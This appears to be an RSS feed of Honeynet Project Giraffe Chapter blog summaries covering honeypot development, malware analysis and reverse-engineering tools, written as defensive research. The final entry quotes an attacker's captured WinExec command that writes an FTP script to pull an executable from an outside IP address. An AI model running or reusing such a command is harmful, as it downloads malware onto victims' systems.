Giraffe Chapterhttp://www.honeynet.org/not_used/48
We are development orientend honeynet chapter. Our main research interests are: low interaction honeypots, emulation, reverse engineering.enIs Android malware served in theatres more sophisticated?http://www.honeynet.org/node/1081
<p><a href="/node/1080">Pietro wrote a nice post</a> about him finding Android malware while visiting the theatre. Thanks to Thug (thank you Angelo) and HoneyProxy, he was able to get some interesting details about their infrastructure. I was curious what kind of malware you find in a theatre, so I quickly looked at one of the samples that he mentioned: <a href="https://www.virustotal.com/it/file/4c7c0bd7ed69614cb58908d6a28d2aa5eeaac2ad6d03cbcad1a9d01f28a14ab9/analysis/">f6ad9ced69913916038f5bb94433848d</a>.</p>
<p><a href="http://www.honeynet.org/node/1081" target="_blank">read more</a></p>androidAPKdecompilationmalwarereverse engineeringsandbox evasionthugGiraffe ChapterThu, 09 Jan 2014 22:44:49 +0000felix.leder1081 at http://www.honeynet.orgHoneyMap - Visualizing Worldwide Attacks in Real-Timehttp://www.honeynet.org/node/960
<p><a href="/node/960"><img src="https://31.24.128.5/sites/default/files/files/images/honeymap.preview.png" width="640" height="358" alt="HoneyMap Screenshot" title="HoneyMap Screenshot" /></a></p>
<p>The HoneyMap shows a real-time visualization of attacks against the Honeynet Project's sensors deployed around the world. It leverages the internal data sharing protocol <a href="https://github.com/rep/hpfeeds">hpfeeds</a> as its data source. Read this post to learn about the technical details and frequently asked questions. Before going into explanations, take a look at the map itself: <a href="http://map.honeynet.org/">map.honeynet.org</a>!</p>
<p><a href="http://www.honeynet.org/node/960" target="_blank">read more</a></p>honeymaphoneypotvisualizationworldmapGiraffe ChapterMon, 01 Oct 2012 14:51:45 +0000mark.schloesser960 at http://www.honeynet.orgGiraffe Chapter - Status Report 2009/2010http://www.honeynet.org/node/707
<p>The Giraffe Chapter's continuous goal is to develop and improve honeypot technology and related tools and to conduct in-depth analysis of new attack techniques and malware specimens. This report lists our main activities and contributions from the last two and a half years.<br />
<br />
_________________________________________________________________________________<br />
<strong>ORGANIZATION</strong><br />
<br />
Much to our regret, two of the founding members of our chapter have decided to terminate their Honeynet Project membership and are thus officially moved to alumni status. We respect this step and are grateful for an adventurous journey and their numerous contributions over the years. We will continue to work closely together with our friends, and want them to know that they can rejoin the team whenever they wish to.<br />
<br />
The Giraffe Chapter consists of the following people:</p>
<ul>
<li><em>Felix Leder</em></li>
<li><em>Mark Schlösser</em></li>
<li><em>Tillmann Werner</em></li>
<li><em>Georg Wicherski</em></li>
</ul>
<p><a href="http://www.honeynet.org/node/707" target="_blank">read more</a></p>Giraffe ChapterFri, 01 Jul 2011 12:40:23 +0000tillmann.werner707 at http://www.honeynet.orgA Breeze of Stormhttp://www.honeynet.org/node/539
<p>Today, Steven Adair from Shadowserver imformed us about a new piece of malware that looks like a new version of the infamous Storm Worm. Storm was one of the first serious peer-to-peer botnets, it was sending out spam for more than two years until its decline in late 2008. Mark Schloesser, Tillmann Werner, Georg Wicherski, and I <a>did some work on how to take down Storm</a> back then, so the rumors about a new version caught our interest.</p>
<p><a href="http://www.honeynet.org/node/539" target="_blank">read more</a></p>Storm WormStormfuckerGiraffe ChapterWed, 28 Apr 2010 00:05:23 +0000felix.leder539 at http://www.honeynet.orgDissecting the SotM Attack Trace Pcaphttp://www.honeynet.org/node/521
<p>Hi everybody,</p>
<p>our first <a href="https://honeynet.org/node/504">Scan of the Month Challenge</a> in 2010 is over! We received 91 submissions in total, and some parts of the solutions are so interesting that I would like to publicly highlight them in this post. Now that the winners are announced (Congratulations Ivan, Franck, and Tareq!), I think I also owe you an explanation why we asked the specific questions and what we expected as answers. I am sure you will be surprised how many pieces of information you can dig up in a plain pcap - I was indeed when I had a look at the solutions we received. Enjoy!</p>
<p><a href="http://www.honeynet.org/node/521" target="_blank">read more</a></p>Forensic Challenge 2010Giraffe ChapterFri, 19 Feb 2010 14:13:35 +0000tillmann.werner521 at http://www.honeynet.orgRE-Google in action - screenshothttp://www.honeynet.org/node/496
<a href="/node/496"><img src="http://www.honeynet.org/sites/default/files/files/images/screenshot.thumbnail.png" alt="RE-Google in action - screenshot" title="RE-Google in action - screenshot" class="image image-thumbnail " width="100" height="81" /></a>Giraffe ChapterSun, 15 Nov 2009 22:49:33 +0000felix.leder496 at http://www.honeynet.orgRE-Google - or how Grandma started Reverse Engineeringhttp://www.honeynet.org/node/493
<p>Some people say "Reverse Engineering is an art". Well, this might be true if you consider stuff like mathematics as art. It is more an application of standard methods that evolve constantly. Actually, everybody can learn these methods and start to RE executables. With the <a href="http://regoogle.carnivore.it">RE-Google</a> plugin for IDA Pro, even your granny can start reversing :)</p>
<p><a href="http://www.honeynet.org/node/493" target="_blank">read more</a></p>beginnergooglere-googlereverse engineeringreversingGiraffe ChapterSun, 15 Nov 2009 22:20:07 +0000felix.leder493 at http://www.honeynet.orgIteolih: RPC vulnerability implementation partyhttp://www.honeynet.org/node/488
<p>The <a title="dionaea homepage" href="http://dionaea.carnivore.it/">Dionaea</a> honeypot got more and more mature during the last weeks. As Markus blogged in <a title="Markus&#039; blog" href="https://www.honeynet.org/node/485">Iteolih: Miles and More</a> the software is now able to detect shellcode via libemu and generates a nice shellcode profile out of this.</p>
<p>The SMB / DCERPC implementation also got fairly mature and is now able to cope with all packet types and also most caveats and differences of implementations in exploits. As I registered more and more RPC vulnerabilities in the module, it was definitely time to give libemu something to eat! :)</p>
<p><a href="http://www.honeynet.org/node/488" target="_blank">read more</a></p>Iteolih Samba DCERPC Python libemuGiraffe ChapterGSoC Project #10 - Develop and Improve the effectiveness of low Interaction HoneypotsTue, 25 Aug 2009 16:33:00 +0000mark.schloesser488 at http://www.honeynet.orgIteolih: Miles and Morehttp://www.honeynet.org/node/485
<p>We got a new milestone due:<br />
<strong>10.08.2009</strong></p>
<ul>
<li>thread-pool works</li>
<li>stream recording works</li>
<li>shellcode detection using libemu works</li>
<li>shellcode emulation using libemu works</li>
<li>compiles on linux&amp;openbsd</li>
</ul>
<p>An exploit taken from a public repository, run against the software, is detected and emulated.<br />
To shorten things, basically all required points are hit with current svn.<br />
So, given the time we just saved, some words about how it works.</p>
<p><a href="http://www.honeynet.org/node/485" target="_blank">read more</a></p>IteolihGiraffe ChapterGSoC Project #10 - Develop and Improve the effectiveness of low Interaction HoneypotsTue, 11 Aug 2009 12:10:33 +0000markus.koetter485 at http://www.honeynet.orgIteolih: malicious ftp serviceshttp://www.honeynet.org/node/470
<p>Yesterday, I got an incomplete, but successful, attack on my honeypot, the attackers remote code execution looked like this:</p>
<p><strong>WinExec("cmd /c echo open 78.1.96.200 4871 &gt; o&amp;echo user 1 1 &gt;&gt; o &amp;echo get msq16.exe &gt;&gt; o")<br />
ExitThread(0)</strong></p>
<p>As the required part to download the malware to the remotehost was incomplete, I got curious and wanted a copy.</p>
<p><a href="http://www.honeynet.org/node/470" target="_blank">read more</a></p>IteolihGiraffe ChapterGSoC Project #10 - Develop and Improve the effectiveness of low Interaction HoneypotsSun, 26 Jul 2009 13:28:13 +0000markus.koetter470 at http://www.honeynet.org